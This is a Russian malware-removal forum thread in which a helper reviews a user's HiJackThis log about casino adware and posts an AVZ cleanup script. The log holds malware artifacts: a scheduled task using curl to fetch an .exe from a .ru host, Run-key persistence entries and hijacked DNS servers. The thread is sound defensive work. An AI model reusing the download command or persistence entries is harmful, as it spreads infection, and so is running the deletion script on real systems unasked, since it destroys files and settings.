Стала появляться реклама казино
Стала появляться реклама казино
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Selina, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте,
HiJackThis (из каталога autologger)профиксить
Если пропадет интернет пропишите на сетевом интерфейсе в качестве днс-серверов:Код:R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [SuggestionsURL] = http://asp.assoc-amazon.co.uk/suggestions?q={searchTerms}&t=hp-uk1-vsb-21 - Amazon (UK) Search Suggestions R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [SuggestionsURL_JSON] = http://completion.amazon.co.uk/search/complete?method=completion&q={searchTerms}&search-alias=aps&client=amzn-search-suggestions/9fe582406fb5106f343a84083d78795713c12d68&mkt=3 - Amazon (UK) Search Suggestions R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [URL] = http://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} - Amazon (UK) Search Suggestions R4 - SearchScopes: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [SuggestionsURL] = http://asp.assoc-amazon.co.uk/suggestions?q={searchTerms}&t=hp-uk1-vsb-21 - Amazon (UK) Search Suggestions R4 - SearchScopes: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [SuggestionsURL_JSON] = http://completion.amazon.co.uk/search/complete?method=completion&q={searchTerms}&search-alias=aps&client=amzn-search-suggestions/9fe582406fb5106f343a84083d78795713c12d68&mkt=3 - Amazon (UK) Search Suggestions R4 - SearchScopes: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{5FDFA8B6-AD39-4D93-ADD4-D814379E4939} [URL] = http://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} - Amazon (UK) Search Suggestions O4 - HKCU\..\Run: [ksjuzkmyhf] = C:\WINDOWS\explorer.exe "http://vodarma.ru/?utm_source=uoua03&utm_content=40cdbb7e3d4c792cb1fd441dfeb542a4&utm_term=205C7D9C9BDCA3E3D7015F968B3B90DA&utm_d=20180711&utm_medium=p_15528_" O4 - HKCU\..\Run: [setupsk_upd] = C:\Users\User\AppData\Roaming\setupsk_upd\python\pythonw.exe "C:\Users\User\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd" O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O17 - HKLM\System\CCS\Services\Tcpip\..\{a17a4a19-1895-410a-bd3f-d5b14167dd35}: [NameServer] = 178.132.6.57 O17 - HKLM\System\CCS\Services\Tcpip\..\{a17a4a19-1895-410a-bd3f-d5b14167dd35}: [NameServer] = 193.238.153.54 O17 - HKLM\System\CCS\Services\Tcpip\..\{a17a4a19-1895-410a-bd3f-d5b14167dd35}: [NameServer] = 46.101.28.31 O17 - HKLM\System\CCS\Services\Tcpip\..\{a17a4a19-1895-410a-bd3f-d5b14167dd35}: [NameServer] = 52.56.51.39 O17 - HKLM\System\CCS\Services\Tcpip\..\{a17a4a19-1895-410a-bd3f-d5b14167dd35}: [NameServer] = 82.202.226.203 O17 - HKLM\System\CCS\Services\Tcpip\..\{ef250679-8ef5-43bc-b6c0-618141e17e35}: [NameServer] = 178.132.6.57 O17 - HKLM\System\CCS\Services\Tcpip\..\{ef250679-8ef5-43bc-b6c0-618141e17e35}: [NameServer] = 193.238.153.54 O17 - HKLM\System\CCS\Services\Tcpip\..\{ef250679-8ef5-43bc-b6c0-618141e17e35}: [NameServer] = 46.101.28.31 O17 - HKLM\System\CCS\Services\Tcpip\..\{ef250679-8ef5-43bc-b6c0-618141e17e35}: [NameServer] = 52.56.51.39 O17 - HKLM\System\CCS\Services\Tcpip\..\{ef250679-8ef5-43bc-b6c0-618141e17e35}: [NameServer] = 82.202.226.203 O22 - Task: StartMenuCache - C:\WINDOWS\explorer.exe http://oktarab.ru O22 - Task: curl - C:\Users\User\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\User\AppData\Roaming\curl\curl.exe O22 - Task: setupsk_upd - C:\Users\User\AppData\Roaming\SETUPS~1\python\pythonw.exe "C:\Users\User\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd"
Код:8.8.8.8 8.8.4.4
AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
После выполнения скрипта компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); QuarantineFileF('c:\users\user\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0); QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\User\AppData\Roaming\SETUPS~1\ml.py',''); QuarantineFile('C:\Users\User\AppData\Roaming\SETUPS~1\python\pythonw.exe',''); QuarantineFile('C:\Users\User\appdata\roaming\system\libs\svchost.exe',''); QuarantineFileF('C:\Users\User\appdata\roaming\system\libs', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "StartMenuCache" /F', 0, 15000, true); DeleteFile('C:\Users\User\appdata\roaming\system\libs\svchost.exe','32'); DeleteFile('C:\Users\User\AppData\Roaming\SETUPS~1\python\pythonw.exe','32'); DeleteFile('C:\Users\User\AppData\Roaming\SETUPS~1\ml.py','32'); DeleteFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '32'); DeleteFileMask('c:\users\user\appdata\roaming\curl', '*', true); DeleteDirectory('c:\users\user\appdata\roaming\curl'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','ksjuzkmyhf'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','setupsk_upd'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); RebootWindows(true); end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
- Подготовьте лог AdwCleaner и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Ваши права в разделе
Ответить с цитированием
